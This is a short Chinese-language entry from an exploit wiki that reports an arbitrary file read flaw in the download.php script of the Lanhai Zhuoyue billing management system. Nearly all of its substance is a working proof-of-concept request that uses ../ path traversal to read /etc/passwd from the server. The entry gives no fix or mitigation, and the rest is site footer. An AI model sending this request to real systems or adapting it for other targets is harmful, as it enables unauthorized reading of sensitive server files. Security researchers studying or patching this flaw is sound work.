蓝海卓越计费管理系统 任意文件读取漏洞

蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件.

poc:

GET /download.php?file=../../../../../etc/passwd HTTP/1.1
Host:

via:peiqi

Edge Security文库 all right reserved,powered by GitbookFile Modify: 2021-05-22 00:14:38

results matching ""

    No results matching ""